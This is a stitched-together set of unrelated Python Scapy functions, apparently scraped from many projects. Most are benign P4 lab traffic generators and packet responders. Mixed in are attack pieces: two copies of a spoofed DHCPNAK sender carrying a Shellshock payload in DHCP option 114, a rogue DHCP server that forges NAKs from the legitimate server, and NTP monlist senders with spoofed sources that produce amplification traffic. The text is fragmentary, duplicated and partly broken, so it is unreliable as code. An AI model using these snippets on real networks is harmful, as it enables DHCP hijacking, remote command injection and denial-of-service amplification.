def nak_request(self, packet): # we are hereby handling the case where we detect one other dhcp server besides our own... dhcp_server_mac = self.other_dhcp_servers.keys()[0] dhcp_server_ip = self.other_dhcp_servers[self.other_dhcp_servers.keys()[0]] print "Spoofing DHCPNAK from %s / %s" % (dhcp_server_mac, dhcp_server_ip) nak = Ether(src=dhcp_server_mac, dst=packet[Ether].dst) / \ IP(src=dhcp_server_ip, dst=packet[IP].dst) / \ UDP(sport=67, dport=68) / \ BOOTP(op=2, ciaddr=packet[IP].src, siaddr=packet[IP].dst, chaddr=packet[Ether].src, xid=packet[BOOTP].xid) / \ DHCP(options=[ ('server_id', dhcp_server_ip), ('message-type','nak'), (114, "() { ignored;}; touch /tmp/test"), ('end')] ) print "sending NAK:" nak.show() scapy.all.sendp(nak)
def nak_request(self, packet): # we are hereby handling the case where we detect one other dhcp server besides our own... dhcp_server_mac = self.other_dhcp_servers.keys()[0] dhcp_server_ip = self.other_dhcp_servers[ self.other_dhcp_servers.keys()[0]] print "Spoofing DHCPNAK from %s / %s" % (dhcp_server_mac, dhcp_server_ip) nak = Ether(src=dhcp_server_mac, dst=packet[Ether].dst) / \ IP(src=dhcp_server_ip, dst=packet[IP].dst) / \ UDP(sport=67, dport=68) / \ BOOTP(op=2, ciaddr=packet[IP].src, siaddr=packet[IP].dst, chaddr=packet[Ether].src, xid=packet[BOOTP].xid) / \ DHCP(options=[ ('server_id', dhcp_server_ip), ('message-type','nak'), (114, "() { ignored;}; touch /tmp/test"), ('end')] ) print "sending NAK:" nak.show() scapy.all.sendp(nak)
def main(): if len(sys.argv)<3: print 'pass 1 arguments: <destination> ' exit(1) #src addr addr = socket.gethostbyname(sys.argv[1]) #dst addr addr1 = socket.gethostbyname(sys.argv[2]) iface = sys.argv[3] # out_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x894f) # in_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x800) # pkt1 = Ether() / IP(src=addr,dst=addr1) / weightwriting() / TCP(dport=80, sport=20) / "hi" # pkt1.show() # hexdump(pkt1) #sendp(pkt1, iface=iface, verbose=False) print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % (iface) for i in range(0,120): pkt = Ether() / IP() / weightwriting(index=i, weight=1) / UDP() pkt.show() pkt.hexdump() sendp(pkt, iface=iface, verbose=False)
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None): """send packet through eth0 or 1st available interfaces""" if iface is None: ifs = get_if_list() for i in ifs: if "eth0" in i: iface = i break if not iface: # tmp test iface = 'lo' if ipVer == 8: pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x888) elif ipVer == 6: pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x86DD) else: print("IP version {} is not supported. Abort Early".format(inVer)) exit(1) pkt = pkt / pkt_ip pkt.show() hexdump(pkt) t0 = time.time() sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True) t_span = time.time() - t0 print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span)) return iface
def handle_arp(pkt): ''' Handle packet containing ARP headers. ''' glock.acquire() print 'in handle_arp' arp_header = pkt[ARP] # Only respond to ARP requests if arp_header.op != 1: print 'arp header had wrong opcode' glock.release() return # Convert the ARP request into in ARP reply arp_header.op = 2 arp_header.hwdst = arp_header.hwsrc pdst = arp_header.pdst arp_header.hwsrc = ip_to_mac[pdst] arp_header.pdst = arp_header.psrc arp_header.psrc = pdst # Send the response print 'about to send arp response' pkt = Ether(src=arp_header.hwsrc, dst=pkt[Ether].src) / arp_header print 'sending arp response on interface %s:' % mac_to_intf[pkt[Ether].dst] pkt.show() glock.release() sendp(pkt, iface=mac_to_intf[pkt[Ether].dst], verbose=0)
def handle_pkt(pkt, iface): print iface #NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4 #NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64 NTP_ITEMS = "\x02" NTP_ITEMS_INT = 2 NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip: src_mac = pkt[Ether].src dst_mac = pkt[Ether].dst src_ip = pkt[IP].src dst_ip = pkt[IP].dst proto = pkt[IP].proto sport = pkt[UDP].sport dport = pkt[UDP].dport id_tup = (src_ip, dst_ip, proto, sport, dport) if src_ip in VALID_IPS: if id_tup not in totals: totals[id_tup] = 0 totals[id_tup] += 1 print ("Received from %s total: %s" % (id_tup, totals[id_tup])) # Respond with random payload p = Ether(dst=src_mac,src=dst_mac)/IP(dst=pkt[IP].src,src=pkt[IP].dst) p = p/UDP(dport=pkt[UDP].sport,sport=123)/NTP(NTP_MONLIST_RESPONSE) print p.show() sendp(p, iface = iface, loop=0)
def handle_pkt(pkt, iface): #NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4 #NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64 NTP_ITEMS = "\x06" #ra = bytearray(random.getrandbits(8) for _ in xrange(3)) ra = "\x06\x01" print ra.decode("utf-8") exit(1) NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + ra + "\x00\x48" + "\x00" * 72 * 6 if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip: src_mac = pkt[Ether].src dst_mac = pkt[Ether].dst src_ip = pkt[IP].src dst_ip = pkt[IP].dst proto = pkt[IP].proto sport = pkt[UDP].sport dport = pkt[UDP].dport id_tup = (src_ip, dst_ip, proto, sport, dport) if src_ip in VALID_IPS: if id_tup not in totals: totals[id_tup] = 0 totals[id_tup] += 1 print("Received from %s total: %s" % (id_tup, totals[id_tup])) # Respond with random payload p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src, src=pkt[IP].dst) p = p / UDP(dport=pkt[UDP].sport, sport=123) / NTP(NTP_MONLIST_RESPONSE) print p.show() sendp(p, iface=iface, loop=0)
def main(): p = make_seq(num_parser, make_seq(op_parser,num_parser)) s = '' iface = 'eth0' while True: s = str(input('> ')) if s == "quit": break print(s) try: i,ts = p(s,0,[]) print(f'ts is: {[t.value for t in ts]}') pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(ts[2].value)) pkt = pkt/' ' pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) resp.show() if resp: p4calc=resp[P4calc] if p4calc: print((p4calc.result)) else: print("cannot find P4calc header in the packet") else: print("Didn't receive response") except Exception as error: print(error)
def dhcp_manipulate(pkt): global LegitDHCPServer, splittedIPv4, rougeServer, maxNAKReply tempOptions = {} for opt in pkt[DHCP].options: if opt == 'end': break elif opt == 'pad': break else: tempOptions[opt[0]] = opt[ 1] # store the option tuple into dictionary #print opt #print tempOptions if tempOptions['message-type'] == 1: # if msg is DHCP discover msg print "Discover:" #pkt.show() #TODO: Normal Server offer options:{'server_id': '136.159.253.46', 'lease_time': 3600, 'name_server': '136.159.1.21', 'domain': 'ucalgary.ca', 46: '\x08', 'subnet_mask': '255.255.255.0', 'message-type': 2, 'router': '10.13.27.1'} randomedIPv4Addr = splittedIPv4 randomedIPv4Addr[3] = str(random.randint(1, 255)) offerIPAddress = reassembleIPAddress(randomedIPv4Addr) tmpRouter_id = splittedIPv4 tmpRouter_id[3] = '1' router_id = reassembleIPAddress(tmpRouter_id) print "Src: ", pkt[Ether].src #TODO: Conver chaddr to Hex otherwise Wireshark will say it's different OfferPacket = Ether(src=rougeServer['MAC'], dst=pkt[Ether].src)/IP(src=rougeServer['IP'],dst=offerIPAddress)/UDP(sport=67,dport=68)\ /BOOTP(op=2, yiaddr= offerIPAddress,ciaddr=pkt[IP].src,siaddr="0.0.0.0",chaddr=pkt[BOOTP].chaddr,giaddr=rougeServer['IP'], xid=pkt[BOOTP].xid)\ /DHCP(options=[('message-type','offer'),('server_id',rougeServer['IP']),('lease_time',3600),('subnet_mask','255.255.255.0'),('router', myIPv4Address), ('end')]) sendp(OfferPacket) #print "Offer from rouge:" OfferPacket.show() print "Offer from rouge:" elif tempOptions['message-type'] == 3: #if msg is Request message print "Request:" pkt.show() print('From Legit') # Fake NAK msg send by pretending legit DHCP Server. When we see request packet for if tempOptions.has_key('server_id'): if rougeServer['NAKReplyCounter'] < maxNAKReply and LegitDHCPServer[ 'MAC'] == tempOptions['server_id']: NAKreply = Ether(src=LegitDHCPServer['MAC'], dst=pkt[Ether].dst)/IP(src=LegitDHCPServer['IP'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)\ /BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)\ /DHCP(options=[('server_id',LegitDHCPServer['IP']),('message-type','nak'), ('end')]) sendp(NAKreply) print "NAK sent out..." rougeServer['NAKReplyCounter'] += 1 # increment NAK msg number AckPacket = Ether(src=rougeServer['MAC'], dst=pkt[Ether].src)/IP(src=rougeServer['IP'],dst=tempOptions['requested_addr'])/UDP(sport=67,dport=68)\ /BOOTP(op=2, yiaddr=tempOptions['requested_addr'],ciaddr="0.0.0.0",siaddr="0.0.0.0",chaddr=pkt[BOOTP].chaddr,sname=pkt[BOOTP].sname,file=pkt[BOOTP].file,giaddr=rougeServer['IP'], xid=pkt[BOOTP].xid)\ /DHCP(options=[('message-type','ack'),('server_id',rougeServer['IP']),('lease_time',3600),('subnet_mask','255.255.255.0'),('router', myIPv4Address), ('end')]) AckPacket.show() sendp(AckPacket) elif tempOptions['message-type'] == 2: pkt.show() print('From Legit') elif tempOptions['message-type'] == 5: pkt.show() print "From Legit"
def main(): iface = "veth1" pkt = Ether(src='00:00:00:00:00:00', dst='00:00:00:00:00:01', type=0x800) pkt.show() hexdump(pkt) # show hexadecimal expression of packet sendp(pkt, iface=iface, verbose=False) print "sending on interface %s to dmac=00:00:00:00:00:01" % (iface)
def main(): if len(sys.argv) != 3: print "Usage: send_magic_pkt.py [flowID] [target_pathID]" print "For example: send_magic_pkt.py 1 2" sys.exit(1) flowID, pathID = sys.argv[1:] p = Ether(type=0x101, dst="ff:ff:ff:ff:ff:ff") / MagicPkt(flowID=int(flowID), pathID=int(pathID)) print p.show() sendp(p, iface = "eth0")
def send_random_traffic(dst, num_packets): dst_mac = None dst_ip = None iface = [i for i in get_if_list() if 'eth0' in i][0] src_mac = [get_if_hwaddr(i) for i in get_if_list() if 'eth0' in i] if len(src_mac) < 1: print("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if src_mac == "00:00:00:00:01:01": src_ip = "10.0.1.1" elif src_mac == "00:00:00:00:02:02": src_ip = "10.0.2.2" elif src_mac == "00:00:00:00:03:03": src_ip = "10.0.3.3" elif src_mac == "00:00:00:00:04:04": src_ip = "10.0.4.4" else: print("Invalid source host") sys.exit(1) if dst == 'h1': dst_mac = "00:00:00:00:01:01" dst_ip = "10.0.1.1" elif dst == 'h2': dst_mac = "00:00:00:00:02:02" dst_ip = "10.0.2.2" elif dst == 'h3': dst_mac = "00:00:00:00:03:03" dst_ip = "10.0.3.3" elif dst == 'h4': dst_mac = "00:00:00:00:04:04" dst_ip = "10.0.4.4" else: print("Invalid host to send to") sys.exit(1) total_pkts = 0 # random_ports = random.sample(xrange(1024, 65535), 10000) # for port in random_ports: # num_packets = random.randint(50, 250) # num_packets = 1 port = 1024 for i in range(num_packets): # data = randomword(100) data = 'a' p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip) p = p / UDP(dport=port) / Raw(load=data) # p = p/TCP(dport=port)/Raw(load=data) print p.show() sendp(p, iface=iface, inter=0.01) total_pkts += 1 print "Sent %s packets in total" % total_pkts
def icmp_reply(self, icmp_request): reply = Ether(icmp_request) reply.show() reply[ICMP].type = 0 # Force re-generation of the checksum reply[ICMP].chksum = None reply[IP].src, reply[IP].dst = reply[IP].dst, reply[IP].src reply[IP].chksum = None reply[Ether].src, reply[Ether].dst = reply[Ether].dst, reply[Ether].src if self.dst_mac is not None: reply[Ether].dst = self.dst_mac return bytes(reply)
def main(): if len(sys.argv) != 3: print "Usage: send_magic_pkt.py [flowID] [target_pathID]" print "For example: send_magic_pkt.py 1 2" sys.exit(1) flowID, pathID = sys.argv[1:] p = Ether(type=0x101, dst="ff:ff:ff:ff:ff:ff") / MagicPkt( flowID=int(flowID), pathID=int(pathID)) print p.show() sendp(p, iface="eth0")
def send_random_traffic(dst, mode): dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if src_mac == "00:00:00:00:00:01": src_ip = "10.0.0.1" elif src_mac == "00:00:00:00:00:02": src_ip = "10.0.0.2" elif src_mac == "00:00:00:00:00:03": src_ip = "10.0.0.3" elif src_mac == "00:00:00:00:00:04": src_ip = "10.0.0.4" else: print("Invalid source host") sys.exit(1) if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:22" dst_ip = "10.0.0.10" elif dst == 'h3': dst_mac = "00:00:00:00:00:03" dst_ip = "10.0.0.3" elif dst == 'h4': dst_mac = "00:00:00:00:00:04" dst_ip = "10.0.0.4" else: print("Invalid host to send to") sys.exit(1) total_pkts = 0 if mode == '1': random_ports = random.sample(xrange(1024, 65535), 40) else: random_ports = [1024, 1025, 1026] for port in random_ports: num_packets = 20 for i in range(num_packets): data = randomword(100) p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip) p = p / TCP(dport=port) / Raw(load=data) print p.show() sendp(p, iface="eth0") total_pkts += 1 print "Sent %s packets in total" % total_pkts
def main(): n = 4 for i in range(n): p = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(dst="10.0.0.2")/TCP(reserved=2, dport=49152+i) / BytePkt(val=0) # !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key. print p.show() sendp(p, iface = "eth0") #p = IP(dst="10.0.0.2")/TCP(reserved=2, dport=10000+i) # !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key. #print p.show() #send(p) sleep(1)
def main(): iface = 'h1-eth0' pkt = Ether(dst='00:04:00:00:03:01', src="00:04:00:00:01:01", type=0x800) / IP(src='10.0.0.1', dst='10.0.0.3', protocol=0x91) / Instr(opcode=0x00, rd=0, rs1=0, rs2=0) pkt = pkt/' ' pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=True) if resp: print "hi" print resp else: print "Didn't receive response"
def main(): n = 4 for i in range(n): p = Ether(dst="ff:ff:ff:ff:ff:ff") / IP(dst="10.0.0.2") / TCP( reserved=2, dport=49152 + i) / BytePkt(val=0) # !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key. print p.show() sendp(p, iface="eth0") #p = IP(dst="10.0.0.2")/TCP(reserved=2, dport=10000+i) # !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key. #print p.show() #send(p) sleep(1)
def downlink(pkt): if IPv6 in pkt: if UDP in pkt and pkt[UDP].dport == 2152: #PAYLOAD PACKET #pkt.show() print "5G CORE TO DASH" data = pkt[Raw].load temp = dl_pdu_session(data) data2 = temp[Padding].load pkt2 = IPv6(data2) pkt3 = Ether(dst="08:00:27:dd:dd:dd", src="08:00:27:aa:aa:aa") / pkt2 pkt3.show() sendp(pkt3, iface="eth2", verbose=False)
def delayReqPkt(): global iface, addr DPSync = DPSyncTag( etherType = 0x9487, opCode = 0b0011, reserved = 0, originalPort = 0 ) pkt = Ether(src=get_if_hwaddr(iface), type=0x9487, dst='ff:ff:ff:ff:ff:ff') pkt =pkt / IP(dst=addr) / DPSync / TS pkt.show() hexdump(pkt) sendp(pkt, iface=iface, verbose=False)
def sendDelayReqPkt(pkt): global iface DPSync = DPSyncTag(etherType=0x9487, opCode=0b0010, reserved=0, originalPort=0) pkt2 = Ether(src=get_if_hwaddr(iface), type=0x9487, dst='ff:ff:ff:ff:ff:ff') pkt2 = pkt2 / IP(dst=pkt[IP].src, src=pkt[IP].dst) / DPSync / TS print("send the delay-req packet!!\n") pkt2.show() hexdump(pkt2) sendp(pkt2, iface=iface, verbose=False)
def get_dhcp_discovery(interface, verbose=False): # get interface hw addr _, hw = get_if_raw_hwaddr(interface) if verbose: print(f"Interface: {interface} -> {hw}") dhcp_discovery = Ether(dst="ff:ff:ff:ff:ff:ff") / IP( src="0.0.0.0", dst="255.255.255.255") / UDP( sport=68, dport=67) / BOOTP(chaddr=hw) / DHCP( options=[("message-type", "discover"), "end"]) if verbose: dhcp_discovery.show() return dhcp_discovery
class EtherLayer(object): """docstring for TCPLayer""" def __init__(self, arguments={}): # super(IPLayer, self).__init__() self.packet = None if not isinstance(arguments, dict): return "Please provide a dictionay" self.arguments = arguments def make(self): self.packet = Ether() for param in self.arguments: if not hasattr(self.packet, param): continue setattr(self.packet, param , self.arguments[param]) return self def updatePacket(self, arguments={}): if not isinstance(arguments, dict): return "Please provide a dictionay" for param in arguments: if not hasattr(self.packet, param): continue setattr(self.packet, param , arguments[param]) return self def getPacket(self): return self.packet def show(self): return self.packet.show() def _getEther(self): return Ether() def addIP(self): packet = IPLayer()._getIP() self.packet = self.packet/packet return self
def send_random_traffic(dst): dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if src_mac == "00:00:00:00:00:01": src_ip = "10.0.0.1" elif src_mac == "00:00:00:00:00:02": src_ip = "10.0.0.2" elif src_mac == "00:00:00:00:00:03": src_ip = "10.0.0.3" else: print("Invalid source host") sys.exit(1) if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:02" dst_ip = "10.0.0.2" elif dst == 'h3': dst_mac = "00:00:00:00:00:03" dst_ip = "10.0.0.3" else: print("Invalid host to send to") sys.exit(1) total_pkts = 0 #random_ports = random.sample(xrange(1024, 65535), 10) #for port in random_ports: #um_packets = random.randint(50, 250) #for i in range(num_packets): for i in range(0, 10): #data = randomword(100) data = "abcd" p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src="10.0.0.1") p = p / TCP(dport=54321) / Raw(load=data) print p.show() sendp(p, iface="eth0") total_pkts += 1 print "Sent %s packets in total" % total_pkts
def send_random_traffic(dst): NTP_MONLIST_REQUEST = "\x17\x00\x03\x2a" + "\x00" * 4 #NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4 NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64 dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:02" dst_ip = "10.0.0.2" elif dst == 'h3': dst_mac = "00:00:00:00:00:03" dst_ip = "10.0.0.3" else: print("Invalid host to send to") sys.exit(1) # Create N src ip N = 1 src_ip_list = list() src_dict = dict() for i in range(0, N): src_ip_list.append(gen_random_ip()) total_pkts = 0 #for src_ip in src_ip_list: for src_ip in ['10.0.0.1']: num_packets = 10 port = random.randint(1024, 65535) for i in range(num_packets): data = set_payload(400) p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip) p = p / UDP(dport=123, sport=port) / NTP(NTP_MONLIST_REQUEST) print p.show() sendp(p, iface="eth0") total_pkts += 1 #print('total_pkts untill now: ' + str(total_pkts)) print "Sent %s packets in total" % total_pkts
def main(): parser = argparse.ArgumentParser() parser.add_argument('-s', '--src-ip', type=str, help="The source IP address to use") parser.add_argument('-d', '--dst-ip', type=str, help="The destination IP address to use") parser.add_argument('-m', '--message', type=str, help="The message to include in packet") parser.add_argument('-t', '--tmp', type=int, default=None, help='The timestamp to include in packet') parser.add_argument('-n', '--pkt-num', type=int, default=1, help='The num of packets to send') args = parser.parse_args() src = socket.gethostbyname(args.src_ip) dst = socket.gethostbyname(args.dst_ip) #print addr tmp = args.tmp iface = get_if() if (tmp is not None): print "sending on interface {} from IP addr {} to IP addr {} with timestamp {}".format(iface, str(src), str(dst), str(tmp)) pkt = Ether(src=get_if_hwaddr(iface), dst='08:00:00:00:ff:00') pkt = pkt / MyTimestamp(tmp=tmp) / IP(src=src, dst=dst) / args.message else: print "sending on interface {} from IP addr {} to IP addr {}".format(iface, str(src), str(dst)) pkt = Ether(src=get_if_hwaddr(iface), dst='08:00:00:00:ff:00') pkt = pkt / IP(src=src, dst=dst) / TCP(dport=1234, sport=random.randint(49152,65535)) / args.message pkt.show() # hexdump(pkt) # print "len(pkt) = ", len(pkt) #sendp(pkt, iface=iface, verbose=False) pkt_num = args.pkt_num s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW) s.bind(('eth0', 0)) start_time = time.time() for i in range(pkt_num): #sendp(p, iface='h%d-eth0' %src) #msg = "Sheng!" + str(i) s.send(str(pkt)) #print len(str(p)) #print str(p)[46:] #hexdump(p) #print p.show() #print struct.unpack("!I", str(p)[62:66])[0] #print int(str(p)[62:66],16) #time.sleep(delay) print "sent" + str(pkt_num) print time.time() - start_time
def downlink(pkt): if IPv6 in pkt: #if GTP_U_Header in pkt: if UDP in pkt and pkt[UDP].dport == 2152: #print "5G_CORE -> DN/UE" #print "ORIGINAL PACKET" #pkt.show() #PAYLOAD PACKET print "5G CORE TO CLIENT" data = pkt[Raw].load temp = dl_pdu_session(data) data2 = temp[Padding].load pkt2 = IPv6(data2) pkt3 = Ether(dst="08:00:27:aa:aa:aa", src="08:00:27:dd:dd:dd") / pkt2 pkt3.show() sendp(pkt3, iface="eth2", verbose=False)
def send_random_traffic(dst): dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print ("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if src_mac =="00:00:00:00:00:01": src_ip = "10.0.0.1" elif src_mac =="00:00:00:00:00:02": src_ip = "10.0.0.2" elif src_mac =="00:00:00:00:00:03": src_ip = "10.0.0.3" else: print ("Invalid source host") sys.exit(1) if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:02" dst_ip = "10.0.0.2" elif dst == 'h3': dst_mac = "00:00:00:00:00:03" dst_ip = "10.0.0.3" else: print ("Invalid host to send to") sys.exit(1) total_pkts = 0 random_ports = random.sample(xrange(1024, 65535), 10) for port in random_ports: num_packets = random.randint(50, 250) for i in range(num_packets): data = randomword(100) p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip) p = p/TCP(dport=port)/Raw(load=data) print p.show() sendp(p, iface = "eth0") total_pkts += 1 print "Sent %s packets in total" % total_pkts
def updownlink(pkt): if IPv6 in pkt: #if GTP_U_Header in pkt: if UDP in pkt and pkt[UDP].dport == 2152: #print "5G_CORE -> DN/UE" #print "ORIGINAL PACKET" #pkt.show() #PAYLOAD PACKET data = pkt[Raw].load temp = dl_pdu_session(data) if temp[dl_pdu_session].Spare == 2: print "5G_CORE TO DASH" #print "PAYLOAD PACKET" data2 = temp[Padding].load pkt2 = IPv6(data2) pkt3 = Ether(dst="08:00:27:dd:dd:dd", src="08:00:27:aa:aa:aa") / pkt2 pkt3.show() sendp(pkt3, iface="eth2", verbose=False) #sys.stdout.flush() #main() else: print "DASH TO 5G_CORE" #print "ORIGINAL PACKET" pkt.show() #5G PACKET CONSTRUCTION pkt5g = Ether( src='00:15:5d:00:00:04', dst='00:15:5d:00:00:00') / IPv6( src="fc00::5", dst="fc00::1") / IPv6ExtHdrRouting( type=4, segleft=2, addresses=["fc00::1", "fc00::101", "fc00::100"]) / UDP( sport=64515, dport=2152) / GTP_U_Header( TEID=32, Reserved=0, E=1) / dl_pdu_session( gtp_ext=133, QoSID=14, Spare=1) #Full packet (5G + USER DATA) pkt2 = pkt5g / pkt[IPv6] #print "5G FULL PACKET" #pkt2.show() sendp(pkt2, iface="eth1", verbose=False)
def send_random_traffic(dst): dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print("No interface for output") sys.exit(1) src_mac = src_mac[0] if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:02" dst_ip = "10.0.0.2" else: print("Invalid host to send to") sys.exit(1) total_pkts = 0 #random_ports = random.sample(xrange(1024, 65535), 10) #for port in random_ports: #um_packets = random.randint(50, 250) #for i in range(num_packets): tracked_ip = "10.0.0.1" true_frequency = 0 for i in range(0, 10000): data = randomword(5) #generate ips between 10.10.0.0 and 10.0.255.255 src_ip = "10.0.0." src_ip += ".".join(map(str, (random.randint(0, 255) for _ in range(1)))) p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip) p = p / TCP(dport=54321) / Raw(load=data) print p.show() sendp(p, iface="eth0") total_pkts += 1 if src_ip == tracked_ip: true_frequency += 1 print "Sent %s packets in total" % total_pkts print "true frequency of %s is %d" % (tracked_ip, true_frequency)
def main(): p1 = make_seq(num_parser, make_seq(op_parser, num_parser)) p2 = make_seq(num_parser, op_parser) s = '' iface = 'enp131s0np1' while True: s = str(raw_input('> ')) if s == "quit": break print s try: if "R" in s or "A" in s: i, ts = p2(s, 0, []) pkt = Ether(src='00:15:4d:12:2d:c5', dst='00:15:4d:00:00:00', type=0x1234) / P4calc(op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(0)) else: i, ts = p1(s, 0, []) pkt = Ether(src='00:15:4d:12:2d:c5', dst='00:15:4d:00:00:00', type=0x1234) / P4calc(op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(ts[2].value)) pkt = pkt / ' ' pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=True) if resp: p4calc = resp[P4calc] print p4calc.result if p4calc: print p4calc.result else: print "cannot find P4calc header in the packet" else: print "Didn't receive response" except Exception as error: print error
def send_random_traffic(host, num_of_messages): NTP_ITEMS = "\x02" NTP_ITEMS_INT = 2 NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT dst_mac = None src_ip = None dst_ip = None legitimate_pkts = 0 spoofed_pkts = 0 total_pkts = 0 # host info -- can be anything src_ip = '10.0.1.99' src_mac = '00:00:00:00:01:99' # Dest info dst_ip = '10.0.1.' + host.split('h')[1] dst_mac = '00:00:00:00:01:0' + host.split('h')[1] # Get name of eth0 interface iface_eth0 = '' for i in get_if_list(): if 'eth0' in i or 's0' in i: iface_eth0 = i mac_iface_eth0 = get_if_hwaddr(iface_eth0) ip_addr_eth0 = get_ip_address(iface_eth0) if len(mac_iface_eth0) < 1: print ("No interface for output") sys.exit(1) # Send request and sleep for some time N = int(num_of_messages) for i in range(N): port = random.randint(1024, 65535) p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip) p = p/UDP(dport=123,sport=port)/NTP(NTP_MONLIST_RESPONSE) print p.show() sendp(p, iface = iface_eth0, loop=0) total_pkts += 1 print '' print "Sent %s packets in total" % total_pkts
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None): """send packet through eth0 or 1st available interfaces""" if iface is None: ifs = get_if_list() for i in ifs: if "eth0" in i: iface = i break if not iface: # tmp test iface = 'lo' pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x888) pkt = pkt / pkt_ip pkt.show() t0 = time.time() sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True) t_span = time.time() - t0 print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span)) return iface
def send_random_traffic(num_of_messages): NTP_MONLIST_REQUEST = "\x17\x00\x03\x2a" + "\x00" * 4 dst_mac = None src_ip = None dst_ip = None legitimate_pkts = 0 spoofed_pkts = 0 total_pkts = 0 # h1 info src_ip = '10.0.1.1' src_mac = '00:00:00:00:01:01' # Dest info dst_ip = '10.0.1.3' dst_mac = '00:00:00:00:01:99' # Get name of eth0 interface iface_eth0 = '' for i in get_if_list(): if 'eth0' in i or 's0' in i: iface_eth0 = i mac_iface_eth0 = get_if_hwaddr(iface_eth0) ip_addr_eth0 = get_ip_address(iface_eth0) if len(mac_iface_eth0) < 1: print("No interface for output") sys.exit(1) # Send request and sleep for some time N = int(num_of_messages) for i in range(N): port = random.randint(1024, 65535) p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip) p = p / UDP(dport=123, sport=port) / NTP(NTP_MONLIST_REQUEST) print p.show() sendp(p, iface=iface_eth0, loop=0) total_pkts += 1 print '' print "Sent %s packets in total" % total_pkts
